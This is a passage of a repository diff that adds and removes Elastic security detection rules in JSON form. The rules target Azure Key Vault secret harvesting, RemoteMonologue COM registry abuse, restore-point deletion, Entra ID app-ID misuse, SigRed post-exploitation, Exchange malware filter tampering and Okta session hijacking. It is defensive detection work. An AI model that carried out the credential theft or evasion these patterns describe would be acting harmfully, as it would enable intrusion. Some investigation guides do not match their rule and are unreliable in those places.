count_distinct(azure.platformlogs.identity.claim.upn),\n Esql.azure_platformlogs_identity_claim_appid_values = values(azure.platformlogs.identity.claim.appid),\n\n Esql.source_ip_values = values(source.ip),\n Esql.source_geo_city_values = values(source.geo.city_name),\n Esql.source_geo_region_values = values(source.geo.region_name),\n 
Esql.source_geo_country_values = values(source.geo.country_name),\n Esql.source_as_organization_name_values = values(source.as.organization.name),\n\n Esql.event_action_values = values(event.action),\n Esql.event_count = count(*),\n Esql.event_action_count_distinct = count_distinct(event.action),\n Esql.azure_resource_name_count_distinct = count_distinct(azure.resource.name),\n Esql.azure_resource_name_values = values(azure.resource.name),\n Esql.azure_platformlogs_result_type_values = values(azure.platformlogs.result_type),\n Esql.cloud_region_values = values(cloud.region),\n\n Esql.agent_name_values = values(agent.name),\n Esql.azure_subscription_id_values = values(azure.subscription_id),\n Esql.azure_resource_group_values = values(azure.resource.group),\n Esql.azure_resource_id_values = values(azure.resource.id)\n\nby Esql.time_window_date_trunc, azure.platformlogs.identity.claim.upn\n\n// keep relevant fields\n| keep\n Esql.time_window_date_trunc,\n Esql_priv.azure_platformlogs_identity_claim_upn_values,\n Esql.azure_platformlogs_identity_claim_upn_count_distinct,\n Esql.azure_platformlogs_identity_claim_appid_values,\n Esql.source_ip_values,\n Esql.source_geo_city_values,\n Esql.source_geo_region_values,\n Esql.source_geo_country_values,\n Esql.source_as_organization_name_values,\n Esql.event_action_values,\n Esql.event_count,\n Esql.event_action_count_distinct,\n Esql.azure_resource_name_count_distinct,\n Esql.azure_resource_name_values,\n Esql.azure_platformlogs_result_type_values,\n Esql.cloud_region_values,\n Esql.agent_name_values,\n Esql.azure_subscription_id_values,\n Esql.azure_resource_group_values,\n Esql.azure_resource_id_values\n\n// Filter for suspiciously high volume of distinct Key Vault reads by a single actor\n| where Esql.azure_platformlogs_identity_claim_upn_count_distinct == 1 and Esql.event_count >= 10 and Esql.event_action_count_distinct >= 2\n\n| sort Esql.time_window_date_trunc desc\n", + "references": [ + "https://www.inversecos.com/2022/05/detection-and-compromise-azure-key.html" + ], + "related_integrations": [ + { + "integration": "platformlogs", + "package": "azure", + "version": "^1.0.0" + } + ], + "risk_score": 43, + "rule_id": "c07f7898-5dc3-11f0-9f27-f661ea17fbcd", + "setup": "#### Required Azure Key Vault Diagnostic Logs\n\nTo ensure this rule functions correctly, the following diagnostic logs must be enabled for Azure Key Vault:\n- AuditEvent: This log captures all read and write operations performed on the Key Vault, including secret, key, and certificate retrievals. 
These logs should be streamed to the Event Hub used for the Azure integration configuration.\n", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: Storage", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Azure Platform Logs", + "Data Source: Azure Key Vault", + "Use Case: Threat Detection", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.006", + "name": "Cloud Secrets Management Stores", + "reference": "https://attack.mitre.org/techniques/T1555/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 4 + }, + "id": "c07f7898-5dc3-11f0-9f27-f661ea17fbcd_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c18975f5-676c-4091-b626-81e8938aa2ee_1.json b/packages/security_detection_engine/kibana/security_rule/c18975f5-676c-4091-b626-81e8938aa2ee_1.json deleted file mode 100644 index eedc838364f..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/c18975f5-676c-4091-b626-81e8938aa2ee_1.json +++ /dev/null @@ -1,107 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies an attempt to perform session hijacking via COM object registry modification by setting the RunAs value to Interactive User.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.registry-*", - "endgame-*", - "logs-m365_defender.event-*", - "logs-sentinel_one_cloud_funnel.*", - "logs-windows.sysmon_operational-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Potential RemoteMonologue Attack", - "note": "## Triage and analysis\n\n### Investigating Potential RemoteMonologue Attack\n\n\n### Possible investigation steps\n\n- Review the registry event logs to confirm the modification of the RunAs value in the specified registry paths, ensuring the change was not part of a legitimate administrative action.\n- Identify the user account and process responsible for the registry modification by examining the event logs for associated user and process information.\n- Check for any recent remote authentication attempts or sessions on the affected host to determine whether this activity is associated with lateral movement.\n- Investigate the timeline of the registry change to correlate with any other suspicious activities or alerts on the host, such as the execution of unusual processes or network connections.\n\n\n### False positive analysis\n\n- Software updates or installations that modify COM settings.\n- Automated scripts or management tools that adjust COM configurations.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement by the adversary.\n- Modify the registry value back to its secure state, ensuring that the \"RunAs\" value is not set to \"Interactive User\".\n- Conduct a thorough review of recent user activity and system logs to identify any unauthorized access or changes made during the period NLA was disabled.\n- Reset passwords for all accounts that have accessed the affected system to 
mitigate potential credential compromise.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.\n- Implement enhanced monitoring on the affected system and similar endpoints to detect any further attempts to disable NLA or other suspicious activities.\n", - "query": "registry where host.os.type == \"windows\" and event.action != \"deletion\" and registry.value == \"RunAs\" and registry.data.strings : \"Interactive User\"\n", - "references": [ - "https://www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions#1", - "https://github.com/xforcered/RemoteMonologue" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^9.0.0" - }, - { - "package": "m365_defender", - "version": "^2.22.0" - }, - { - "package": "sentinel_one_cloud_funnel", - "version": "^1.9.0" - }, - { - "package": "windows", - "version": "^2.5.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "registry.data.strings", - "type": "wildcard" - }, - { - "ecs": true, - "name": "registry.value", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "c18975f5-676c-4091-b626-81e8938aa2ee", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Sysmon", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1112", - "name": "Modify Registry", - "reference": "https://attack.mitre.org/techniques/T1112/" - }, - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 1 - }, - "id": "c18975f5-676c-4091-b626-81e8938aa2ee_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c1a3e2f0-8a1b-11ef-9b4a-f661ea17fbce_1.json b/packages/security_detection_engine/kibana/security_rule/c1a3e2f0-8a1b-11ef-9b4a-f661ea17fbce_1.json new file mode 100644 index 00000000000..860d9fb1fa3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c1a3e2f0-8a1b-11ef-9b4a-f661ea17fbce_1.json @@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the deletion of Azure Restore Point Collections by a user who has not previously performed this activity. Restore Point Collections contain recovery points for virtual machines, enabling point-in-time recovery capabilities. Adversaries may delete these collections to prevent recovery during ransomware attacks or to cover their tracks during malicious operations.", + "false_positives": [ + "Restore Point Collection deletions may be performed by system administrators during routine cleanup or decommissioning activities. Verify whether the user and resource should be performing these operations. Deletions from unfamiliar users or targeting critical resources should be investigated. 
If known behavior is causing false positives, it can be exempted from the rule." + ], + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-azure.activitylogs-*", + "filebeat-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Azure Compute Restore Point Collection Deleted by Unusual User", + "new_terms_fields": [ + "azure.activitylogs.identity.claims_initiated_by_user.name", + "azure.resource.group" + ], + "note": "## Triage and analysis\n\n### Investigating Azure Compute Restore Point Collection Deleted by Unusual User\n\nAzure Compute Restore Point Collections are critical components for disaster recovery, containing snapshots that enable point-in-time\nrecovery of virtual machines. Deletion of these collections can severely impact an organization's ability to recover from\nincidents, making them attractive targets for adversaries conducting ransomware attacks or attempting to cover their tracks.\n\nThis rule detects when a user who has not previously deleted Restore Point Collections performs this operation, which may\nindicate unauthorized activity or a compromised account.\n\n### Possible investigation steps\n\n- Review the `azure.activitylogs.identity.claims_initiated_by_user.name` field to identify the specific user who performed the deletion operation.\n- Investigate the `azure.resource.id` or `azure.resource.name` fields to identify which Restore Point Collection was deleted and assess its criticality to business operations.\n- Review the timeline of the deletion event and correlate it with other security events or user activities to identify any suspicious patterns or related activities.\n- Verify whether the user account has legitimate access to perform this operation and whether this deletion was authorized through change management processes.\n- Check for any other unusual activities by the same user account around the time of the deletion, such as privilege escalation attempts or access to other sensitive resources.\n- Investigate whether there are any active alerts or indicators of compromise related to ransomware activity in the environment.\n\n### False positive analysis\n\n- Routine administrative activities by infrastructure teams may trigger this alert when team members rotate or new administrators are onboarded. Create exceptions for known administrative accounts after verification.\n- Automated cleanup scripts or Azure policies that periodically remove old restore points may cause alerts. Identify and exclude service accounts used for these automated operations.\n- Planned decommissioning activities or migration projects may involve legitimate deletion of restore point collections. Document these activities and create temporary exceptions during known maintenance windows.\n- Testing and development environments may see frequent creation and deletion of resources. Consider excluding these environments from monitoring or adjusting the rule to focus on production resources only.\n\n### Response and remediation\n\n- Immediately verify the legitimacy of the deletion operation with the user or their manager. If the activity is unauthorized, proceed with incident response procedures.\n- If unauthorized deletion is confirmed, immediately isolate the affected user account to prevent further malicious activity. 
Reset credentials and review account permissions.\n- Check if the deleted Restore Point Collection can be recovered through Azure backup services or other recovery mechanisms.\n- Review and audit all recent activities performed by the affected user account to identify other potentially malicious actions.\n- Assess the impact on disaster recovery capabilities and inform relevant stakeholders about potential recovery limitations.\n- Review access controls and permissions for Restore Point Collection management, implementing the principle of least privilege where necessary.\n- If ransomware activity is suspected, escalate to the security incident response team and implement broader containment measures, including checking for other indicators of ransomware such as deletion of Recovery Services vaults or backup fabric containers.\n- Document the incident and update detection rules or procedures based on lessons learned.\n", + "query": "event.dataset: azure.activitylogs and\n event.action: \"MICROSOFT.COMPUTE/RESTOREPOINTCOLLECTIONS/DELETE\" and\n event.outcome: (Success or success)\n", + "references": [ + "https://www.microsoft.com/en-us/security/blog/2023/07/25/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c1a3e2f0-8a1b-11ef-9b4a-f661ea17fbce", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: Storage", + "Data Source: Azure", + "Data Source: Azure Activity Logs", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "c1a3e2f0-8a1b-11ef-9b4a-f661ea17fbce_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c766bc56-fdca-11ef-b194-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/c766bc56-fdca-11ef-b194-f661ea17fbcd_1.json deleted file mode 100644 index da34ba0d695..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/c766bc56-fdca-11ef-b194-f661ea17fbcd_1.json +++ /dev/null @@ -1,106 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies rare Azure Entra ID app IDs requesting authentication on-behalf-of a principal user. An adversary with stolen credentials may specify an Azure-managed app ID to authenticate on-behalf-of a user. This is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. 
The app ID specified may not be commonly used by the user based on their historical sign-in activity.", - "from": "now-9m", - "history_window_start": "now-14d", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Entra ID Rare App ID for Principal Authentication", - "new_terms_fields": [ - "azure.signinlogs.properties.user_principal_name", - "azure.signinlogs.properties.app_id" - ], - "note": "## Triage and analysis\n\n### Investigating Azure Entra ID Rare App ID for Principal Authentication\n\nThis rule identifies rare Azure Entra app IDs requesting authentication on-behalf-of a principal user. An adversary with stolen credentials may specify an Azure-managed app ID to authenticate on-behalf-of a user. This is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The app ID specified may not be commonly used by the user based on their historical sign-in activity.\n\n**This is a New Terms rule that focuses on the first occurrence of the client `azure.signinlogs.properties.app_id` requesting authentication on-behalf-of the principal user `azure.signinlogs.properties.user_principal_name` in the last 14 days.**\n\n### Possible investigation steps\n\n- Identify the source IP address from which the failed login attempts originated by reviewing `source.ip`. Determine if the IP is associated with known malicious activity using threat intelligence sources or if it belongs to a corporate VPN, proxy, or automation process.\n- Analyze affected user accounts by reviewing `azure.signinlogs.properties.user_principal_name` to determine if they belong to privileged roles or high-value users. Look for patterns indicating multiple failed attempts across different users, which could suggest a password spraying attempt.\n- Examine the authentication method used in `azure.signinlogs.properties.authentication_details` to identify which authentication protocols were attempted and why they failed. Legacy authentication methods may be more susceptible to brute-force attacks.\n- Review the authentication error codes found in `azure.signinlogs.properties.status.error_code` to understand why the login attempts failed. Common errors include `50126` for invalid credentials, `50053` for account lockouts, `50055` for expired passwords, and `50056` for users without a password.\n- Correlate failed logins with other sign-in activity by looking at `event.outcome`. Identify if there were any successful logins from the same user shortly after multiple failures or if there are different geolocations or device fingerprints associated with the same account.\n- Review `azure.signinlogs.properties.app_id` to identify which applications were initiating the authentication attempts. Determine if these applications are Microsoft-owned, third-party, or custom applications and if they are authorized to access the resources.\n- Check for any conditional access policies that may have been triggered by the failed login attempts by reviewing `azure.signinlogs.properties.authentication_requirement`. 
This can help identify if the failed attempts were due to policy enforcement or misconfiguration.\n\n## False positive analysis\n\n### Common benign scenarios\n- Automated scripts or applications using non-interactive authentication may trigger this detection, particularly if they rely on legacy authentication protocols recorded in `azure.signinlogs.properties.authentication_protocol`.\n- Corporate proxies or VPNs may cause multiple users to authenticate from the same IP, appearing as repeated failed attempts under `source.ip`.\n- User account lockouts from forgotten passwords or misconfigured applications may show multiple authentication failures in `azure.signinlogs.properties.status.error_code`.\n\n### How to reduce false positives\n- Exclude known trusted IPs, such as corporate infrastructure, from alerts by filtering `source.ip`.\n- Exclude known custom applications from `azure.signinlogs.properties.app_id` that are authorized to use non-interactive authentication.\n- Ignore principals with a history of failed logins due to legitimate reasons, such as expired passwords or account lockouts, by filtering `azure.signinlogs.properties.user_principal_name`.\n- Correlate sign-in failures with password reset events or normal user behavior before triggering an alert.\n\n## Response and remediation\n\n### Immediate actions\n- Block the source IP address in `source.ip` if determined to be malicious.\n- Reset passwords for all affected user accounts listed in `azure.signinlogs.properties.user_principal_name` and enforce stronger password policies.\n- Ensure basic authentication is disabled for all applications using legacy authentication protocols listed in `azure.signinlogs.properties.authentication_protocol`.\n- Enable multi-factor authentication (MFA) for impacted accounts to mitigate credential-based attacks.\n- Review Conditional Access policies to ensure they are correctly configured to enforce risk-based authentication and block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`.\n\n### Long-term mitigation\n- Implement a zero-trust security model by enforcing least privilege access and continuous authentication.\n- Regularly review and update conditional access policies to ensure they are effective against evolving threats.\n- Restrict the use of legacy authentication protocols by disabling authentication methods listed in `azure.signinlogs.properties.client_app_used`.\n- Regularly audit authentication logs in `azure.signinlogs` to detect abnormal login behavior and ensure early detection of potential attacks.\n- Regularly rotate client credentials and secrets for applications using non-interactive authentication to reduce the risk of credential theft.\n", - "query": "event.dataset: \"azure.signinlogs\" and event.category: \"authentication\"\n and azure.signinlogs.properties.is_interactive: false\n and azure.signinlogs.properties.user_type: \"Member\"\n and not azure.signinlogs.properties.client_app_used: \"Browser\"\n and not source.as.organization.name: \"MICROSOFT-CORP-MSN-AS-BLOCK\"\n", - "references": [ - "https://securityscorecard.com/wp-content/uploads/2025/02/MassiveBotnet-Report_022125_03.pdf" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.signinlogs.properties.client_app_used", - "type": 
"keyword" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.is_interactive", - "type": "boolean" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.user_type", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.as.organization.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "c766bc56-fdca-11ef-b194-f661ea17fbcd", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra ID Sign-in", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/", - "subtechnique": [ - { - "id": "T1078.004", - "name": "Cloud Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 1 - }, - "id": "c766bc56-fdca-11ef-b194-f661ea17fbcd_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_213.json b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_213.json deleted file mode 100644 index 7d8f68939e6..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_213.json +++ /dev/null @@ -1,108 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation.", - "from": "now-9m", - "index": [ - "winlogbeat-*", - "logs-endpoint.events.file-*", - "logs-windows.sysmon_operational-*", - "endgame-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Unusual File Modification by dns.exe", - "note": "## Triage and analysis\n\n### Investigating Unusual File Modification by dns.exe\nDetection alerts from this rule indicate potential unusual/abnormal file writes from the DNS Server service process (`dns.exe`) after exploitation from CVE-2020-1350 (SigRed) has occurred. 
Here are some possible avenues of investigation:\n- Post-exploitation, adversaries may write additional files or payloads to the system as additional discovery/exploitation/persistence mechanisms.\n- Any suspicious or abnormal files written from `dns.exe` should be reviewed and investigated with care.\n", - "query": "file where host.os.type == \"windows\" and process.name : \"dns.exe\" and event.type in (\"creation\", \"deletion\", \"change\") and\n not file.name : \"dns.log\" and not\n (file.extension : (\"old\", \"temp\", \"bak\", \"dns\", \"arpa\") and file.path : \"C:\\\\Windows\\\\System32\\\\dns\\\\*\") and\n\n /* DNS logs with custom names, header converts to \"DNS Server log\" */\n not ?file.Ext.header_bytes : \"444e5320536572766572206c6f67*\"\n", - "references": [ - "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", - "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", - "https://www.elastic.co/security-labs/detection-rules-for-sigred-vulnerability" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^9.0.0" - }, - { - "package": "windows", - "version": "^2.5.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": false, - "name": "file.Ext.header_bytes", - "type": "unknown" - }, - { - "ecs": true, - "name": "file.extension", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Endgame", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1210", - "name": "Exploitation of Remote Services", - "reference": "https://attack.mitre.org/techniques/T1210/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 213 - }, - "id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_213", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_207.json b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_207.json deleted file mode 100644 index 5eefd64f264..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_207.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a malware filter rule has been deleted or disabled in Microsoft 365. An adversary or insider threat may want to modify a malware filter rule to evade detection.", - "false_positives": [ - "A malware filter rule may be deleted by a system or network administrator. Verify that the configuration change was expected. 
Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Exchange Malware Filter Rule Modification", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Exchange Malware Filter Rule Modification\n\nMicrosoft 365 Exchange uses malware filter rules to protect email systems by identifying and blocking malicious content. Adversaries may attempt to disable or remove these rules to bypass security measures and facilitate attacks. The detection rule monitors audit logs for successful actions that alter these rules, signaling potential defense evasion tactics. This helps security analysts quickly identify and respond to unauthorized modifications.\n\n### Possible investigation steps\n\n- Review the audit logs for the specific event.dataset:o365.audit entries with event.provider:Exchange to confirm the occurrence of the rule modification.\n- Identify the user account associated with the event.action:(\"Remove-MalwareFilterRule\" or \"Disable-MalwareFilterRule\") and verify if the action was authorized or expected.\n- Check the event.category:web logs for any related activities around the same timeframe to identify potential patterns or additional suspicious actions.\n- Investigate the event.outcome:success to ensure that the modification was indeed successful and assess the impact on the organization's security posture.\n- Correlate the identified actions with any recent security incidents or alerts to determine if this modification is part of a larger attack or threat campaign.\n- Review the user's recent activity and access logs to identify any other unusual or unauthorized actions that may indicate compromised credentials or insider threat behavior.\n\n### False positive analysis\n\n- Routine administrative changes to malware filter rules by authorized IT personnel can trigger alerts. To manage this, maintain a list of authorized users and their expected activities, and create exceptions for these users in the monitoring system.\n- Scheduled maintenance or updates to Microsoft 365 configurations might involve temporary disabling of certain rules. Document these activities and adjust the monitoring system to recognize these as non-threatening.\n- Automated scripts or third-party tools used for system management may perform actions that resemble rule modifications. Ensure these tools are properly documented and their actions are whitelisted if verified as safe.\n- Changes made during incident response or troubleshooting can appear as rule modifications. 
Coordinate with the incident response team to log these activities and exclude them from triggering alerts.\n\n### Response and remediation\n\n- Immediately isolate the affected user accounts and systems to prevent further unauthorized modifications to the malware filter rules.\n- Re-enable or recreate the disabled or removed malware filter rules to restore the intended security posture of the Microsoft 365 environment.\n- Conduct a thorough review of recent email traffic and logs to identify any potential malicious content that may have bypassed the filters during the period of rule modification.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems or accounts have been compromised.\n- Implement enhanced monitoring and alerting for any future attempts to modify malware filter rules, ensuring rapid detection and response.\n- Review and update access controls and permissions for administrative actions within Microsoft 365 to limit the ability to modify security configurations to only essential personnel.\n- Document the incident, including actions taken and lessons learned, to improve future response efforts and update incident response plans accordingly.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-MalwareFilterRule\" or \"Disable-MalwareFilterRule\") and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterrule?view=exchange-ps", - "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-malwarefilterrule?view=exchange-ps" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "ca79768e-40e1-4e45-a097-0e5fbc876ac2", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "ca79768e-40e1-4e45-a097-0e5fbc876ac2_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_305.json b/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_305.json deleted file mode 100644 index 4ffce7f9b4c..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_305.json +++ /dev/null @@ -1,56 +0,0 @@ -{ - "attributes": { - "author": [ - 
"Elastic" - ], - "description": "This rule detects when a specific Okta actor has multiple device token hashes for a single Okta session. This may indicate an authenticated session has been hijacked or is being used by multiple devices. Adversaries may hijack a session to gain unauthorized access to Okta admin console, applications, tenants, or other resources.", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Multiple Device Token Hashes for Single Okta Session", - "note": "## Triage and analysis\n\n### Investigating Multiple Device Token Hashes for Single Okta Session\n\nThis rule detects when a specific Okta actor has multiple device token hashes for a single Okta session. This may indicate an authenticated session has been hijacked or is being used by multiple devices. Adversaries may hijack a session to gain unauthorized access to Okta admin console, applications, tenants, or other resources.\n\n#### Possible investigation steps:\n- Since this is an ES|QL rule, the `okta.actor.alternate_id` and `okta.authentication_context.external_session_id` values can be used to pivot into the raw authentication events related to this alert.\n- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields.\n- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields.\n- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field.\n - Historical analysis should indicate if this device token hash is commonly associated with the user.\n- Review the `okta.event_type` field to determine the type of authentication event that occurred.\n - Authentication events have been filtered out to focus on Okta activity via established sessions.\n- Review the past activities of the actor(s) involved in this action by checking their previous actions.\n- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity.\n - This may help determine the authentication and authorization actions that occurred between the user, Okta and application.\n- Aggregate by `okta.actor.alternate_id` and `event.action` to determine the type of actions that are being performed by the actor(s) involved in this action.\n - If various activity is reported that seems to indicate actions from separate users, consider deactivating the user's account temporarily.\n\n### False positive analysis:\n- It is very rare that a legitimate user would have multiple device token hashes for a single Okta session as DT hashes do not change after an authenticated session is established.\n\n### Response and remediation:\n- Consider stopping all sessions for the user(s) involved in this action.\n- If this does not appear to be a 